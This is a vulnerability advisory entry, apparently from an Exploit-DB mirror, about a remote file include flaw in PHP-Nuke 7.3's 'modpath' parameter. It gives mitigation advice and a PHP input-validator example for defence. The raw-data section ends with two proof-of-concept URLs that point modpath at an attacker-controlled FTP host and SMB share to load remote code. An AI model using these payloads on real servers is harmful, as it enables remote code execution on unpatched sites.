vendor: PHP-Nuke
by:
CVSS: 7.5 (HIGH)
CWE: File Include
Product Name: PHP-Nuke
Affected Version From: PHP-Nuke version 7.3
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:php-nuke:php-nuke:7.3
Metasploit:
Other Scripts:
Platforms Tested:

PHP-Nuke File Include Vulnerability

The PHP-Nuke application is prone to a potential file include vulnerability. This vulnerability allows a remote attacker to include malicious files that contain arbitrary code, which can be executed on a vulnerable system. The vulnerability is exploited by manipulating the 'modpath' parameter in the application's URL.

Mitigation:

It is recommended to update to a patched version of PHP-Nuke to mitigate this vulnerability. Additionally, input validation and sanitization should be implemented to prevent arbitrary file inclusion.
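
One way to implement the input validation recommended above, as an added example (not PHP-Nuke's code and not from the advisory's author): a hypothetical `resolve_modpath()` helper that rejects URL-scheme and UNC-style values and confines the result to an assumed module directory. This entry does not show how PHP-Nuke consumes `modpath`, so the function name, the module root and the sample inputs are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical validator for a 'modpath'-style request parameter.
// resolve_modpath() and the module root are illustrative, not PHP-Nuke code.
function resolve_modpath(string $modpath, string $moduleRoot): ?string
{
    // Reject URL wrappers (ftp://, http://, php://, data:), UNC or
    // protocol-relative prefixes (//host/share, \\host\share) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $modpath)
        || preg_match('#^[\\\\/]{2}#', $modpath)
        || strpos($modpath, "\0") !== false) {
        return null;
    }
    // Allow-list: plain relative directory names only, so no "..", no
    // backslashes and no leading slash survive.
    if (!preg_match('#^[A-Za-z0-9_\-]+(?:/[A-Za-z0-9_\-]+)*/?\z#', $modpath)) {
        return null;
    }
    $root = realpath($moduleRoot);
    $candidate = realpath($moduleRoot . DIRECTORY_SEPARATOR . $modpath);
    if ($root === false || $candidate === false || !is_dir($candidate)) {
        return null;
    }
    // After symlink resolution the target must still sit under the root.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo: a temporary module tree and sample inputs. The last two
// values mirror the URL shapes listed in this entry, with placeholder hosts.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'modroot_' . bin2hex(random_bytes(4));
mkdir($root . DIRECTORY_SEPARATOR . 'News', 0700, true);
$samples = ['News', 'News/', '../', 'Missing',
            'ftp://attacker.example/directory/', '//192.0.2.10/share_name/'];
foreach ($samples as $in) {
    $out = resolve_modpath($in, $root);
    printf("%-36s %s\n", $in, $out === null ? 'REJECTED' : 'OK ' . $out);
}
rmdir($root . DIRECTORY_SEPARATOR . 'News');
rmdir($root);
```

Only the two `News` inputs resolve; every other sample is rejected before any path reaches an `include`. Keeping `allow_url_include = Off` in php.ini (the PHP default) adds a second layer against URL-wrapper values.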
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10365/info

PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter.

If successful, the malicious script supplied by the attacker will be executed in the context of the web server hosting the vulnerable software.

http://www.example.com/nuke73/index.php?modpath=ftp://attacker.com/directory/
http://www.example.com/nuke73/index.php?modpath=//attacker_ip/share_name/